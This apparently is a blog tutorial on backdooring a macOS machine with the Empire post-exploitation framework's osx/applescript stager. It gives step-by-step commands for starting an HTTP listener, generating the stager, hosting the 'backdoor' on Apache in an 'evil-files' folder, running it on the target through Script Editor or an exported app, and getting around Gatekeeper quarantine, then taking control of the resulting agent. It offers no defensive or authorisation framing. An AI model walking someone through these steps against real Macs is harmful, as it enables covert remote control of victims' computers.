In this article, I will show you how to compromise a macOS (OS X) machine using an Empire stager.
There are several stagers available in Empire, but in this article I want to focus on osx/applescript.
What is Empire?
Empire is a post-exploitation framework that includes a pure-PowerShell Windows agent and Python agents for Linux and OS X.
Empire runs its agent and modules in memory, so it leaves few artifacts on disk and is less likely to be picked up by file-based antivirus. It is not invisible: the stager still has to be launched by a process on the target, and the agent's traffic to the listener can still be seen on the network.
How to Install Empire?
1. Clone the Empire repository from GitHub
2. Navigate to the setup directory
3. Run the install.sh script
How to Run Empire?
1. Navigate to the main directory of Empire
2. Run the empire launcher script from that directory (it needs to run as root, so use sudo):
Note: You can use the ‘help’ command within empire to list all the commands that can be used.
Listening For Incoming Connections:
1. To open the listeners management menu, we can use the ‘listeners’ command.
2. Now that we are inside the listeners management menu, we can type ‘uselistener’, press <space> and hit <tab> twice to list all the listener types that can be used.
uselistener + <space> + <tab> <tab>
3. For our example, we will be using an http listener so we can just type ‘http’ and hit <enter>.
4. We can use the ‘info’ command to see the options that can be used with the listener.
5. The options that we are interested in here are: Name, Host and Port. Host defaults to the IP of the attacking machine; set it explicitly if the target must reach you on a different address (for example through NAT). Each option is set with its own ‘set’ command:
set Name http_listener1
set Port 8080
6. Once done with the options, we can use the ‘execute’ command to start our listener.
Generating an OSX Stager:
1. To list all the available stagers, we can type ‘usestager’, press <space> and hit the <tab> button twice.
usestager + <space> + <tab> <tab>
2. For our example, we will be using ‘osx/applescript’ so we can just type ‘osx/applescript’ and hit <enter>.
3. We can use the ‘info’ command to see the options that can be used with the stager.
4. The options that we are interested in here are: Listener and OutFile. Listener must match the name of the listener started above, and OutFile is where the generated script is written:
set Listener http_listener1
set OutFile /tmp/applescript
5. Once done, we can use the ‘execute’ command to generate our stager.
We can now deliver the generated stager to our target. To make sure the backdoor actually works before worrying about anything else, we will use a very basic delivery method first.
Delivering Our Backdoor:
1. To deliver our backdoor, we will use apache2, a web server that comes pre-installed with Kali. All we have to do is copy our backdoor into /var/www/html/evil-files (create that directory first; if it does not exist, cp will silently create a single file named evil-files instead):
cp /tmp/applescript /var/www/html/evil-files
2. We can start our webserver by using the following command:
service apache2 start
3. Now let’s go to the OS X machine and see if we can reach the backdoor through the web browser. All we have to do is browse to http://[Attacker’s IP]/evil-files (Apache shows a directory listing, since the folder has no index page) and select applescript to view the content of the file.
Once done with all of the above, we can copy the content into Script Editor and run it from there by clicking the Run button.
We can also export the script as an application through File > Export, choosing Application as the file format. Note that an unsigned application that is downloaded to another Mac through a browser gets a quarantine attribute and will be blocked by Gatekeeper; running the exported app on the same machine, as we do here, avoids that.
As soon as the backdoor is executed on the target, a new agent checks in to the listener and appears within Empire.
Now we can interact with our target: the ‘agents’ command lists the agents that have checked in, and ‘interact’ followed by the agent name opens a session with it.
I hope you find it useful 🙂